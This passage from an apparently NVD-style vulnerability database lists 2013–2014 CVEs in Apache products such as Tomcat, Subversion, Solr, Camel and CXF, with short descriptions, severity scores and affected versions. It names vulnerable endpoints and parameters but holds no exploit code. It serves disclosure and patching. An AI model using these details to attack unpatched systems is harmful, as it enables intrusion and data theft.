apache tomcat 7.0.20
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.26
apache tomcat 7.0.27
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
CVE-2013-4505 LOW

The is_this_legal function in mod_dontdothat for Apache Subversion 1.4.0 through 1.7.13 and 1.8.0 through 1.8.4 allows remote attackers to bypass intended access restrictions and possibly cause a denial of service (resource consumption) via a relative URL in a REPORT request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache mod_dontdothat -
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2013-4517 MEDIUM

Apache Santuario XML Security for Java before 1.5.6, when applying Transforms, allows remote attackers to cause a denial of service (memory consumption) via crafted Document Type Definitions (DTDs), related to signatures.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 1.2.0
apache santuario_xml_security_for_java 1.2.1
apache santuario_xml_security_for_java *
apache santuario_xml_security_for_java 1.5.2
apache santuario_xml_security_for_java 1.4.4
apache santuario_xml_security_for_java 1.4.8
apache santuario_xml_security_for_java 1.4.3
apache santuario_xml_security_for_java 1.4.2
apache santuario_xml_security_for_java 1.4.1
apache santuario_xml_security_for_java 1.5.3
apache santuario_xml_security_for_java 1.4.0
apache santuario_xml_security_for_java 1.4.5
apache santuario_xml_security_for_java 1.3.0
apache santuario_xml_security_for_java 1.4.6
apache santuario_xml_security_for_java 1.5.1
apache santuario_xml_security_for_java 1.4.7
apache santuario_xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.0
CVE-2013-4558 LOW

The get_parent_resource function in repos.c in mod_dav_svn Apache HTTPD server module in Subversion 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4, when built with assertions enabled and SVNAutoversioning is enabled, allows remote attackers to cause a denial of service (assertion failure and Apache process abort) via a non-canonical URL in a request, as demonstrated using a trailing /.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.7.11
apache subversion 1.7.12
apache subversion 1.8.2
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.7.13
apache mod_dav_svn -
apache subversion 1.8.1
CVE-2013-4590 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
debian debian_linux 7.0
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
oracle solaris 11.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-5704 MEDIUM

The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server 2.4.7
redhat enterprise_linux_server_aus 7.4
apache http_server 2.2.19
oracle http_server 11.1.1.7.0
apache http_server 2.2.4
apache http_server 2.2.11
oracle solaris 11.2
oracle http_server 12.1.3.0
apache http_server 2.4.3
apache http_server 2.4.10
redhat enterprise_linux_server 6.0
apache http_server 2.2.0
apache http_server 2.2.16
redhat jboss_enterprise_web_server 3.0.0
oracle enterprise_manager_ops_center 12.2.1
apache http_server 2.2.26
apache http_server 2.2.12
oracle http_server 12.1.2.0
oracle linux 6
apple mac_os_x *
apache http_server 2.2.23
redhat enterprise_linux_eus 7.3
apache http_server 2.2.13
redhat enterprise_linux_eus 7.5
apache http_server 2.4.6
apache http_server 2.2.8
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_tus 7.7
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.2.22
redhat enterprise_linux_workstation 6.0
apache http_server 2.2.3
redhat jboss_enterprise_web_server 2.0.0
canonical ubuntu_linux 14.10
redhat enterprise_linux_server 7.0
apache http_server 2.2.10
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
apache http_server 2.2.2
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
oracle enterprise_manager_ops_center 12.2.0
apache http_server 2.2.20
canonical ubuntu_linux 14.04
apache http_server 2.2.5
redhat enterprise_linux_desktop 7.0
apache http_server 2.2.25
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
apple mac_os_x_server *
apache http_server 2.2.6
oracle enterprise_manager_ops_center 12.1.4
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
canonical ubuntu_linux 10.04
apache http_server 2.2.18
apache http_server 2.4.4
redhat enterprise_linux_server_aus 7.7
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.4.9
apache http_server 2.2.24
oracle http_server 10.1.3.5.0
oracle enterprise_manager_ops_center *
CVE-2013-6348 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.3.15.3 allow remote attackers to inject arbitrary web script or HTML via the namespace parameter to (1) actionNames.action and (2) showConfig.action in config-browser/.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.3.15.3
CVE-2013-6357 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the Manager application in Apache Tomcat 5.5.25 and earlier allows remote attackers to hijack the authentication of administrators for requests that manipulate application deployment via the POST method, as demonstrated by a /manager/html/undeploy?path= URI. NOTE: the vendor disputes the significance of this report, stating that "the Apache Tomcat Security team has not accepted any reports of CSRF attacks against the Manager application ... as they require a reckless system administrator.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5
apache tomcat 5.0.0
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 3.2.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2013-6397 MEDIUM

Directory traversal vulnerability in SolrResourceLoader in Apache Solr before 4.6 allows remote attackers to read arbitrary files via a .. (dot dot) or full pathname in the tr parameter to solr/select/, when the response writer (wt parameter) is set to XSLT. NOTE: this can be leveraged using a separate XXE (XML eXternal Entity) vulnerability to allow access to files across restricted network boundaries.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.5.0
apache solr 4.2.1
apache solr 4.1.0
apache solr 4.4.0
apache solr *
apache solr 4.0.0
apache solr 4.3.0
apache solr 4.3.1
CVE-2013-6398 LOW

The virtual router in Apache CloudStack before 4.2.1 does not preserve the source restrictions in firewall rules after being restarted, which allows remote attackers to bypass intended restrictions via a request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 4.1.0
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 4.1.1
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2013-6407 MEDIUM

The UpdateRequestHandler for XML in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr *
apache solr 3.6.1
apache solr 4.0.0
apache solr 3.6.0
apache solr 3.6.2
CVE-2013-6408 MEDIUM

The DocumentAnalysisRequestHandler in Apache Solr before 4.3.1 does not properly use the EmptyEntityResolver, which allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-6407.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.2.1
apache solr 4.1.0
apache solr *
apache solr 3.6.1
apache solr 4.0.0
apache solr 3.6.0
apache solr 3.6.2
CVE-2013-6438 MEDIUM

The dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Server before 2.4.8 does not properly remove whitespace characters from CDATA sections, which allows remote attackers to cause a denial of service (daemon crash) via a crafted DAV WRITE request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 12.04
canonical ubuntu_linux 10.04
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.10
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
oracle http_server 10.1.3.5.0
oracle http_server 12.1.2.0
CVE-2013-6480 LOW

Libcloud 0.12.3 through 0.13.2 does not set the scrub_data parameter for the destroy DigitalOcean API, which allows local users to obtain sensitive information by leveraging a new VM.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache libcloud 0.13.2
apache libcloud 0.12.3
apache libcloud 0.12.4
apache libcloud 0.13.0
apache libcloud 0.13.1
CVE-2013-7285 HIGH

Xstream API versions up to 1.4.6 and version 1.4.10, if the security framework has not been initialized, may allow a remote attacker to run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. e.g. JSON.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
xstream_project xstream *
xstream_project xstream 1.4.10
apache activemq 5.15.8
oracle endeca_information_discovery_studio 3.2.0
CVE-2013-7372 MEDIUM

The engineNextBytes function in classlib/modules/security/src/main/java/common/org/apache/harmony/security/provider/crypto/SHA1PRNG_SecureRandomImpl.java in the SecureRandom implementation in Apache Harmony through 6.0M3, as used in the Java Cryptography Architecture (JCA) in Android before 4.4 and other products, when no seed is provided by the user, uses an incorrect offset value, which makes it easier for attackers to defeat cryptographic protection mechanisms by leveraging the resulting PRNG predictability, as exploited in the wild against Bitcoin wallet applications in August 2013.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
google android 4.1
apache harmony *
google android 4.0.3
google android 4.2.1
google android *
google android 4.0
google android 4.0.1
google android 4.2
google android 4.0.2
google android 4.2.2
google android 4.1.2
google android 4.0.4
google android 4.3
CVE-2013-7393 LOW

The daemonize.py module in Subversion 1.8.0 before 1.8.2 allows local users to gain privileges via a symlink attack on the pid file created for (1) svnwcsub.py or (2) irkerbridge.py when the --pidfile option is used. NOTE: this issue was SPLIT from CVE-2013-4262 based on different affected versions (ADT3).

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.8.1
CVE-2014-0002 HIGH

The XSLT component in Apache Camel before 2.11.4 and 2.12.x before 2.12.3 allows remote attackers to read arbitrary files and possibly have other unspecified impact via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.10.7
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.10.1
apache camel 2.10.4
apache camel 2.11.2
apache camel *
apache camel 1.6.1
apache camel 2.0.0
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.10.3
apache camel 2.12.1
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.11.1
apache camel 2.10.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
CVE-2014-0003 HIGH

The XSLT component in Apache Camel 2.11.x before 2.11.4, 2.12.x before 2.12.3, and possibly earlier versions allows remote attackers to execute arbitrary Java methods via a crafted message.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.10.7
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.10.1
apache camel 2.10.4
apache camel 2.11.2
apache camel *
apache camel 1.6.1
apache camel 2.0.0
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.2
apache camel 2.12.0
apache camel 2.10.3
apache camel 2.12.1
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.11.1
apache camel 2.10.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
CVE-2014-0030 HIGH

The XML-RPC protocol support in Apache Roller before 5.0.3 allows attackers to conduct XML External Entity (XXE) attacks via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache roller 3.1
apache roller 5.0.1
apache roller 4.0.1
apache roller 5.0
apache roller 5.0.2
apache roller 4.0
CVE-2014-0031 MEDIUM

The (1) ListNetworkACL and (2) listNetworkACLLists APIs in Apache CloudStack before 4.2.1 allow remote authenticated users to list network ACLS for other users via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 4.1.0
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 4.1.1
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2014-0032 MEDIUM

The get_resource function in repos.c in the mod_dav_svn module in Apache Subversion before 1.7.15 and 1.8.x before 1.8.6, when SVNListParentPath is enabled, allows remote attackers to cause a denial of service (crash) via vectors related to the server root and request methods other than GET, as demonstrated by the "svn ls http://svn.example.com" command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.8.2
apache subversion *
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.0
apache subversion 1.7.8
apache subversion 1.7.10
apache subversion 1.7.5
apache subversion 1.8.1
apache subversion 1.7.11
apache subversion 1.7.12
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2014-0033 MEDIUM

org/apache/catalina/connector/CoyoteAdapter.java in Apache Tomcat 6.0.33 through 6.0.37 does not consider the disableURLRewriting setting when handling a session ID in a URL, which allows remote attackers to conduct session fixation attacks via a crafted URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 6.0.33
apache tomcat 6.0.36
apache tomcat 6.0.34
apache tomcat 6.0.35
apache tomcat 6.0.37
CVE-2014-0034 MEDIUM

The SecurityTokenService (STS) in Apache CXF before 2.6.12 and 2.7.x before 2.7.9 does not properly validate SAML tokens when caching is enabled, which allows remote attackers to gain access via an invalid SAML token.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.2.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.7.4
apache cxf 2.6.5
apache cxf 2.6.1
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.7.1
apache cxf *
apache cxf 2.6.8
apache cxf 2.6.2
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0035 MEDIUM

The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.3
redhat jboss_enterprise_application_platform 6.0.0
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.6.8
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.6.11
redhat jboss_enterprise_application_platform 6.2.0
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.6.5
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf *
apache cxf 2.6.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0043 MEDIUM

In Apache Wicket 1.5.10 or 6.13.0, by issuing requests to special urls handled by Wicket, it is possible to check for the existence of particular classes in the classpath and thus check whether a third party library with a known security vulnerability is in use.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket 6.13.0
apache wicket 1.5.10
CVE-2014-0048 HIGH

An issue was found in Docker before 1.6.0. Some programs and scripts in Docker are downloaded via HTTP and then executed or used in unsafe ways.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache geode 1.12.0
docker docker *
CVE-2014-0050 HIGH

MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
oracle retail_applications 13.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache commons_fileupload 1.2
apache tomcat 7.0.44
apache commons_fileupload 1.1.1
apache tomcat 7.0.12
oracle retail_applications 12.0in
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
oracle retail_applications 13.1
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache commons_fileupload 1.0
apache commons_fileupload 1.2.2
oracle retail_applications 13.2
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
oracle retail_applications 14.0
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
oracle retail_applications 13.3
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
oracle retail_applications 12.0
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache commons_fileupload 1.2.1
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.14
apache tomcat 7.0.49
apache commons_fileupload 1.1
oracle retail_applications 13.4
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.2
apache commons_fileupload *
apache tomcat 7.0.22
apache tomcat 7.0.30
CVE-2014-0072 MEDIUM

ios/CDVFileTransfer.m in the Apache Cordova File-Transfer standalone plugin (org.apache.cordova.file-transfer) before 0.4.2 for iOS and the File-Transfer plugin for iOS from Cordova 2.4.0 through 2.9.0 might allow remote attackers to spoof SSL servers by leveraging a default value of true for the trustAllHosts option.

CVSS 2.0

Severity: MEDIUM

